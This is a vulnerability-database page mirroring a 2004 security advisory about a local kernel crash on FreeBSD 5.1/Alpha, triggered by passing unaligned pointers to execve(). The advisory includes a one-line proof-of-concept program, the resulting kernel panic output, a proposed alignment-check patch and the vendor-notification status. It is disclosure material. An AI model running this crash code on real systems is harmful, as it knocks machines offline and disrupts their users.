Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

freebsd.local.txt

🗓️ 25 Jun 2004 00:00:00Reported by Marceta MilosType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

FreeBSD local Denial of Service via unaligned memory access in execve() syscall mentioned.

Code
`Security Advisory : FreeBSD local DoS  
  
Systems affected:  
  
FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable.  
FreeBSD 5.1-RELEASE/IA32 is _not_ vulnerable.  
  
Not sure about other FreeBSD/arch but they could be vulnerable too.  
  
Risk: low  
  
Date: 23 June 2004  
  
Legal notice:  
  
1. This Advisory is Copyright (c) 2004 Marceta Milos.  
2. You may distribute it unmodified.   
3. You may not modify it and distribute it or distribute  
parts of it without the author's permission.  
4. This document stays open for revision. Anything may  
change without notice. For a possible update you may  
visit author's homepage which should be redesigned soon.  
  
  
Disclaimer:  
  
I am not responsible for any damage caused by use  
of the information provided in this document.  
  
  
Description:  
  
It is possible to crash kernel on FreeBSD/Alpha, by passing unaligned  
memory address as a 2nd or 3rd argument to execve() syscall.  
  
  
Condition:   
  
To crash the system, first arg of execve() must point to accessible filename.  
  
  
Demonstration code:  
  
# cat kernkill.c   
  
/*  
* FreeBSD/Alpha local DoS  
* by Marceta Milos  
* [email protected]  
*  
*/  
  
char main() { execve("/bin/ls",(int *)(main + 1), 0); }  
  
/* eof */  
  
# gcc kernkill.c -okk  
#./kk  
  
fatal kernel trap:  
  
trap entry = 0x4 (unaligned access fault)  
cpuid = 0  
faulting va = 0x120000891  
opcode = 0x29  
register = 0x0  
pc = 0xfffffc0000651bf0  
ra = 0xfffffc00004900e0  
sp = 0xfffffe0039c3f840  
usp = 0x11fffae0  
curthread = 0xfffffc00620a3720  
  
pid = 713, comm = kk  
  
panic: trap  
cpuid = 0;  
  
syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231 231 231  
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231  
giving up on 141 buffers  
Uptime: 13m13s  
Automatic reboot in 15 seconds - press a key on the console to abort  
Rebooting...  
  
  
Workaround:  
  
You may make a proper use of ALIGNED_POINTER macro which already exists in  
src/sys/alpha/include/param.h to check if ptrs are aligned, or make your  
own like:  
  
#define PTR_ALIGNED(x) (((x) & 0x7) == 0)  
  
Putting the following line at the top of execve() in src/sys/kern/kern_exec.c  
should prevent the crash (unfortunatly, this is not tested. Idea is mine, a  
little corrected by Mr. Dag-Erling Smørgrav, FreeBSD deputy security officer):  
  
if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))  
return (EFAULT);  
  
  
Vendor status: FreeBSD was notified on Sat 19/06/2004 23:50 -0000  
  
Greets to: LSD, teso, phenoelit, synnergy, thc, netric, scut, silvio, stinger && eSDee.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2004 00:00Current
freebsdlocal denial of serviceunaligned memory accessexecve syscallsystem crashlegal notice.
39